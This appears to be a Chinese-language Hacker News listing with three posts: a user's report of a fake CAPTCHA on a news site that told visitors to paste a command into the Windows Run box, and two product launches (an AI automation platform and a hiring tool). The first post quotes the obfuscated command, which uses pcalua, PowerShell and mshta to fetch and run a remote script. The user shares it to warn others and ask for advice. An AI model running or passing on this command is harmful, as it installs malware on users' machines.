14作者: Jgoauh12 天前
大家好, 今天早上我开始轮班时,想着先浏览一些新闻博客/网站来开始新的一天。当我访问 Crooked Timber 时,我看到了一个验证码页面,看起来像传统的谷歌验证码。 我点击了它,加载图标旋转了一下,右侧弹出一个框,显示着蓝底白字的传统“请验证您是人类”的标题。 它显示了 2 个“手动验证步骤”: 1. 按 Win + R 2. 按 Ctrl + V 然后按运行 起初我以为这是一种新的验证方式,用来检查浏览器是否连接了物理键盘。但我立刻意识到这是企图让我运行一段脚本。 我打开了一个新的标签页,令我惊讶的是,剪贴板里竟然有新内容: “pcalua -a "PowerShell" -c "saps cmd '/v/c m^s^h^t^a h^t^t^p^s^:^/^/^/fine-work-team.com/^6272' -Wi Hi"” 我将这段内容提交给了我工作单位提供的一个大型语言模型,它告诉我绝对不要运行它(我本来也没打算运行),并解释说该命令会从该 URL 下载并运行一个脚本。 我该如何保护自己免受这类诈骗/黑客攻击?我一直认为自己“有准备”,但这次我还是感到惊讶。 您以前遇到过这种情况吗?您是如何保护自己的?
17作者: retsol12 天前
各位 HN 的朋友们!我是 Tines 的 Yannick,非常激动地向大家宣布我们今天推出的新产品。<p>Tines 3B 是我们为构建 AI 代理、应用程序和自动化流程的团队打造的新产品。我们的出发点是,人们已经在这样做,无论 IT 或安全部门是否知情。<p>财务、市场营销等部门正在使用 Claude Code 或 Codex 构建仪表板。这些行为并非恶意,人们只是在完成被赋予的任务。问题在于,这些工作缺乏一个安全运行的便捷途径:它们最终会运行在笔记本电脑或个人账户上,凭证直接粘贴在代码中,而且没有人能够看到它的存在。<p>Tines 3B 就是这些工作运行的地方:每个人仍然可以以同样的方式进行构建,但它将在 IT 和安全部门能够实际看到和控制的环境中执行。<p>它采用代码优先的方式,您描述您想要的功能,您的 LLM 将编写实现代码,并通过代理处理隔离执行和凭证,而不是将凭证嵌入代码中。<p>我们的另一款产品在过去八年中一直在安全和 IT 团队最敏感的系统中运行。这只是针对一类新的构建者,解决了相同的基础问题(谁可以访问什么,以及谁可以看到它)。<p>我们的 Explorer 版本永久免费,完全自助服务:<a href="https:&#x2F;&#x2F;login.tines.com&#x2F;saml_idp&#x2F;signup" rel="nofollow">https:&#x2F;&#x2F;login.tines.com&#x2F;saml_idp&#x2F;signup</a>
1作者: genekrapivin12 天前
各位黑客们!<p>我和我的搭档厌倦了不透明的招聘流程以及那些只是将大型语言模型包装在简历周围(甚至声称如此)的“原生AI”人力资源软件,所以我们创建了Hiring Method来做相反的事情。<p>它将简历和职位要求转化为结构化数据,然后使用一个透明的数学引擎来评估匹配度。你将获得一个清晰、可审计的评分卡,准确地展示候选人为何是合适人选,而不是依赖一个黑箱。我们目前正在开发一项招聘功能,以帮助首先找到这些候选人。<p>我们为此已经工作了1.5年,在经历了几个想法的调整后,我们终于在一个月前将其上线。<p>温馨提示:由于这是一个B2B工具,目前注册需要经过一个入职电话。我知道Show HN偏好即时开放访问,所以我希望在这里分享我们的项目仍然是可以的!<p>非常期待大家对技术方法的反馈。